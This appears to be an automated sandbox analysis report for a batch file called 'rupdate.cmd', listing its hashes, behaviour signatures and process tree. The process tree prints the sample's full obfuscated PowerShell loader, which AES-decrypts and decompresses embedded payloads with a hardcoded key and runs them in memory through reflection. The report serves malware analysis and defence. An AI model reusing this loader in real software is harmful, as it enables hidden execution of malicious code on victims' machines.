Analysis
-
max time kernel
120s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
11/03/2024, 20:01
Static task
static1
Behavioral task
behavioral1
Sample
rupdate.cmd
Resource
win7-20231129-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
rupdate.cmd
Resource
win10v2004-20240226-en
6 signatures
150 seconds
General
-
Target
rupdate.cmd
-
Size
61KB
-
MD5
e2c6aa50d199d28c6c91c31f4a0cecad
-
SHA1
281110edb18aa02b0f7bda95842bbfc89fa18df3
-
SHA256
ff563d075c5fc7628d94f0d8e4c3d594bb1cefb40faa995211d5bd854f87573b
-
SHA512
769f9fdff4bb299047733cc899303b1c4af2db0c72dba2aa13c7f1635c8256ee3e06a5ff46755f6c337fb4a87ae0c6d07288cc21fba84d2fa54800a8553a75cf
-
SSDEEP
1536:fvRba4CqbY73esiV0iqdvcl0odSVZnm+C:XsfesipWvUw2
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2868 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2868 powershell.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2248 2244 cmd.exe 29 PID 2244 wrote to memory of 2248 2244 cmd.exe 29 PID 2244 wrote to memory of 2248 2244 cmd.exe 29 PID 2244 wrote to memory of 2396 2244 cmd.exe 30 PID 2244 wrote to memory of 2396 2244 cmd.exe 30 PID 2244 wrote to memory of 2396 2244 cmd.exe 30 PID 2396 wrote to memory of 2372 2396 cmd.exe 32 PID 2396 wrote to memory of 2372 2396 cmd.exe 32 PID 2396 wrote to memory of 2372 2396 cmd.exe 32 PID 2396 wrote to memory of 2564 2396 cmd.exe 33 PID 2396 wrote to memory of 2564 2396 cmd.exe 33 PID 2396 wrote to memory of 2564 2396 cmd.exe 33 PID 2396 wrote to memory of 2868 2396 cmd.exe 34 PID 2396 wrote to memory of 2868 2396 cmd.exe 34 PID 2396 wrote to memory of 2868 2396 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\rupdate.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\2⤵PID:2248
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\rupdate.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\cmd.execmd /c \"set __=^&rem\3⤵PID:2372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\rupdate.cmd';$LFwP='LQNtJoaQNtJdQNtJ'.Replace('QNtJ', ''),'MaUuFginUuFgMoUuFgdulUuFgeUuFg'.Replace('UuFg', ''),'DecZyHQomZyHQpZyHQreZyHQsZyHQsZyHQ'.Replace('ZyHQ', ''),'GetTcXjCuTcXjrrTcXjenTcXjtPTcXjrTcXjoceTcXjssTcXj'.Replace('TcXj', ''),'CrUcRReaUcRRteUcRRDeUcRRcUcRRrypUcRRtorUcRR'.Replace('UcRR', ''),'SplUzbpitUzbp'.Replace('Uzbp', ''),'CsyNPhansyNPgesyNPEsyNPxtesyNPnssyNPisyNPonsyNP'.Replace('syNP', ''),'EFsAOnFsAOtFsAOryPFsAOoFsAOintFsAO'.Replace('FsAO', ''),'FroJsEmmBaJsEmse6JsEm4SJsEmtriJsEmngJsEm'.Replace('JsEm', ''),'TrxpRKanxpRKsxpRKfoxpRKrxpRKmxpRKFixpRKnaxpRKlBlxpRKockxpRK'.Replace('xpRK', ''),'CoQQaApyTQQaAoQQaA'.Replace('QQaA', ''),'ReaRwuAdLiRwuAnRwuAesRwuA'.Replace('RwuA', ''),'EltBEnetBEnmentBEnttBEnAttBEn'.Replace('tBEn', ''),'Invsdpvosdpvkesdpv'.Replace('sdpv', '');powershell -w hidden;function vWWlW($sWOtr){$LeffD=[System.Security.Cryptography.Aes]::Create();$LeffD.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LeffD.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LeffD.Key=[System.Convert]::($LFwP[8])('7d4AFjj4qrImXG7jYt74EelSDmn179g+v8W/gWHYD+w=');$LeffD.IV=[System.Convert]::($LFwP[8])('h4A9PoLMYbrcJ9FDgep5DQ==');$BWzRm=$LeffD.($LFwP[4])();$RZsbQ=$BWzRm.($LFwP[9])($sWOtr,0,$sWOtr.Length);$BWzRm.Dispose();$LeffD.Dispose();$RZsbQ;}function uxFCF($sWOtr){$AxWJf=New-Object System.IO.MemoryStream(,$sWOtr);$ufEMe=New-Object System.IO.MemoryStream;$pwlbZ=New-Object System.IO.Compression.GZipStream($AxWJf,[IO.Compression.CompressionMode]::($LFwP[2]));$pwlbZ.($LFwP[10])($ufEMe);$pwlbZ.Dispose();$AxWJf.Dispose();$ufEMe.Dispose();$ufEMe.ToArray();}$ARkNi=[System.IO.File]::($LFwP[11])([Console]::Title);$qWGdG=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 5).Substring(2))));$cpVwN=uxFCF (vWWlW ([Convert]::($LFwP[8])([System.Linq.Enumerable]::($LFwP[12])($ARkNi, 6).Substring(2))));[System.Reflection.Assembly]::($LFwP[0])([byte[]]$cpVwN).($LFwP[7]).($LFwP[13])($null,$null);[System.Reflection.Assembly]::($LFwP[0])([byte[]]$qWGdG).($LFwP[7]).($LFwP[13])($null,$null); "3⤵PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-